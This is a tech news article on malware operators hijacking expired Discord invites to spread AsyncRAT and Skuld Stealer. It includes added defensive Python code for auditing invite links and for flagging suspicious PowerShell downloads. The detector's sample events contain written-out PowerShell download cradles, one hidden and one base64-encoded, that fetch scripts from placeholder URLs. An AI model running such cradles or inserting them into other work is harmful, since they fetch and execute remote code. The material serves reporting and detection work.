Malware Campaign Hijacks Old Discord Links To Hack Crypto Users
Wizcase was established in 2018 as an independent site reviewing VPN services and covering privacy-related stories. Today, our team of hundreds of cybersecurity researchers, writers, and editors continues to help readers fight for their online freedom in partnership with Kape Technologies PLC, which also owns the following products: ExpressVPN, CyberGhost, Intego and Private Internet Access which may be ranked and reviewed on this website. The reviews published on Wizcase are believed to be accurate as of the date of each article, and written according to our strict reviewing standards that prioritize the independent, professional and honest examination of the reviewer, taking into account the technical capabilities and qualities of the product together with its commercial value for users. The rankings and reviews we publish may also take into consideration the common ownership mentioned above, and affiliate commissions we earn for purchases through links on our website. We do not review all VPN providers and information is believed to be accurate as of the date of each article.
Hackers are hijacking expired Discord invite links to trick users into malware infections that steal crypto wallets and bypass browser security tools.
In a rush? Here are the quick facts:
- AsyncRAT and Skuld Stealer target crypto wallets and sensitive user data.
According to the Check Point Research team, cybercriminals are using expired Discord invite links to lead users to malicious servers, resulting in advanced malware infections.
Attackers hijack former invite links that belonged to trusted communities and use them to send users to imitation Discord servers. The fake servers trick users into downloading malware, including AsyncRAT and Skuld Stealer, malware that targets cryptocurrency wallets.
The attackers exploit the way Discord handles invite links, which can be temporary or permanent. Once a link is abandoned, they reclaim it and point it at a malicious Discord server.
In this way, users who click on what appear to be valid invitations from social media or outdated posts are automatically taken to malicious servers controlled by hackers.
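For server owners, the practical check is whether invite links in their own published material still lead to their server. An added example (not from Check Point or this article), in which the `resolve` lookup, the server IDs and the sample text are constructed assumptions:

```python
import re

# discord.gg/<code>, discord.com/invite/<code> and the legacy discordapp.com form
INVITE_RE = re.compile(
    r"(?:https?://)?(?:www\.)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)",
    re.IGNORECASE,
)

def extract_invite_codes(text):
    """Return invite codes in order of first appearance, without duplicates."""
    codes = []
    for code in INVITE_RE.findall(text):
        if code not in codes:
            codes.append(code)
    return codes

def audit_invites(text, expected_guild_id, resolve):
    """Classify each invite found in `text`.

    `resolve(code)` is a caller-supplied lookup (hypothetical here) that returns
    the ID of the server an invite currently points to, or None if it is dead.
    """
    findings = []
    for code in extract_invite_codes(text):
        guild_id = resolve(code)
        if guild_id is None:
            status = "expired"      # dead link: remove it from published pages
        elif guild_id == expected_guild_id:
            status = "ok"
        else:
            status = "redirected"   # now leads to a different server
        findings.append((code, status))
    return findings

# Constructed sample: old announcement text and a stubbed lookup table.
OUR_GUILD = "111111111111111111"
SAMPLE_TEXT = (
    "Join us at https://discord.gg/projchat or https://discord.com/invite/Ab12Cd "
    "(mirror: discord.gg/oldevent, again https://discord.gg/projchat)."
)
STUB = {"projchat": OUR_GUILD, "Ab12Cd": "999999999999999999"}

if __name__ == "__main__":
    for code, status in audit_invites(SAMPLE_TEXT, OUR_GUILD, STUB.get):
        print(f"{code}: {status}")
```

Both "expired" and "redirected" results call for editing the page that carries the link, since an expired code is exactly what the campaign reclaims.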
Inside these fake servers, users encounter a bot called “Safeguard” that presents a fake verification process. After starting the verification, users are sent to a phishing website, which runs a malicious PowerShell command.
The command retrieves malicious software from GitHub, Bitbucket, and Pastebin, so that the operation blends in with standard web traffic.
The malware runs in multiple stages to evade detection. A GitHub link is the first download target and serves a PowerShell script. The loader then retrieves the encrypted malware from Bitbucket and decrypts it for installation on the user’s computer.
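On the detection side, the first stage described above shows up in process-creation logs as PowerShell fetching content from one of these platforms. An added example (not Check Point's detection logic or part of this article), with constructed events and placeholder URLs; the event field names are assumptions:

```python
import base64
import re
from urllib.parse import urlparse

# Hosting platforms the article names as payload sources.
WATCHED_HOSTS = ("github.com", "githubusercontent.com", "bitbucket.org", "pastebin.com")
DOWNLOADERS = re.compile(r"invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|"
                         r"downloadstring|downloadfile|net\.webclient|start-bitstransfer", re.I)
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)

def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE), if any."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def watched_urls(text):
    def watched(url):
        host = (urlparse(url).hostname or "").lower()
        return any(host == h or host.endswith("." + h) for h in WATCHED_HOSTS)
    return [u for u in URL.findall(text) if watched(u)]

def triage(events):
    """Return (host, urls) for PowerShell launches that download from a watched platform."""
    alerts = []
    for ev in events:
        if not re.search(r"(?:powershell|pwsh)(?:\.exe)?$", ev["image"], re.I):
            continue
        text = expand_encoded(ev["cmdline"])
        urls = watched_urls(text)
        if urls and DOWNLOADERS.search(text):
            alerts.append((ev["host"], urls))
    return alerts

# Constructed process-creation events; hosts and URLs are placeholders.
_CRADLE = "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": "powershell.exe", "cmdline":
     "powershell -w hidden iwr https://raw.githubusercontent.com/EXAMPLE/x/main/a.ps1 -OutFile a.ps1"},
    {"host": "ws-02", "image": "powershell.exe", "cmdline": "powershell -NoProfile -enc " + _ENC},
    {"host": "ws-03", "image": "powershell.exe", "cmdline": "powershell Get-ChildItem C:\\Temp"},
    {"host": "ws-04", "image": "git.exe", "cmdline": "git clone https://github.com/EXAMPLE/repo.git"},
]
```

Legitimate admin scripts also download from these platforms, so a hit is a triage signal to correlate with what the user was doing, not a verdict.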
The final payloads, AsyncRAT and Skuld Stealer, let attackers remotely control systems and steal important information, including user credentials and crypto wallet details from the Exodus and Atomic applications. The malware uses timed delays of up to 15 minutes to evade automated security systems.
Additionally, the attackers found a way to circumvent the protection that Google Chrome’s App-Bound Encryption provides for cookies. They modified ChromeKatz to extract login cookies directly from the memory of the Chrome, Edge, and Brave browsers.
The attacks have targeted users in the United States, Vietnam, France, Germany, and other countries. The attackers appear to focus on cryptocurrency users, because their malware specifically targets wallet credentials and recovery phrases.
The researchers believe cybercriminals will develop new methods despite Discord disabling the specific bot used in this campaign. Users should protect themselves from such attacks by avoiding outdated Discord invites, while being cautious about verification requests and maintaining current antivirus software.
Hi, I’m Kiara Fabbri, a Tech News Writer at WizCase.